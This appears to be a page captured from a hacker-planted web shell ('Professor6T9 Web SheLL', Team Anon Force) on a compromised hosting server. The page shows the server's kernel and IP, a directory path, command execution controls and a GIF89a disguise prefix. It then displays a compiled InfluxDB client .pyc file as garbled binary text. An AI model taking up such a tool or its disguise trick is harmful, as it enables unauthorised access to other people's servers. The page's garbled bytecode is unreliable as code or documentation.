GIF89;aGIF89;aGIF89;a
Team Anon Force
https://t.me/Professor6T9x
Professor6T9 Web SheLL
Linux das102.truehost.cloud 4.18.0-553.8.1.lve.el8.x86_64 #1 SMP Thu Jul 4 16:24:39 UTC 2024 x86_64
LiteSpeed
156.232.88.2
/
proc
/
self
/
root
/
opt
/
alt
/
python38
/
lib
/
python3.8
/
site-packages
/
influxdb_client
/
domain
/
__pycache__
[ HOME ]
Exec
Submit
notification_endpoints.cpython-38.pyc
U ܒi� � @ s( d Z ddlZddlZG dd� de�ZdS )a InfluxDB OSS API Service. The InfluxDB v2 API provides a programmatic interface for all interactions with InfluxDB. Access the InfluxDB API using the `/api/v2/` endpoint. # noqa: E501 OpenAPI spec version: 2.0.0 Generated by: https://openapi-generator.tech � Nc @ s� e Zd ZdZddd�Zddd�Zddd �Zed d� �Zej dd� �Zed d� �Z e j dd� �Z dd� Zdd� Zdd� Z dd� Zdd� ZdS )�NotificationEndpointsz�NOTE: This class is auto generated by OpenAPI Generator. Ref: https://openapi-generator.tech Do not edit the class manually. zlist[NotificationEndpoint]ZLinks)�notification_endpoints�linksZnotificationEndpointsr Nc C s2 d| _ d| _d| _|dk r || _|dk r.|| _dS )z3NotificationEndpoints - a model defined in OpenAPI.N)�_notification_endpoints�_linksZ discriminatorr r )�selfr r � r �^/opt/alt/python38/lib/python3.8/site-packages/influxdb_client/domain/notification_endpoints.py�__init__* s zNotificationEndpoints.__init__c C s | j S )z�Get the notification_endpoints of this NotificationEndpoints. :return: The notification_endpoints of this NotificationEndpoints. :rtype: list[NotificationEndpoint] �r �r r r r r 5 s z,NotificationEndpoints.notification_endpointsc C s || _ dS )z�Set the notification_endpoints of this NotificationEndpoints. :param notification_endpoints: The notification_endpoints of this NotificationEndpoints. :type: list[NotificationEndpoint] Nr )r r r r r r >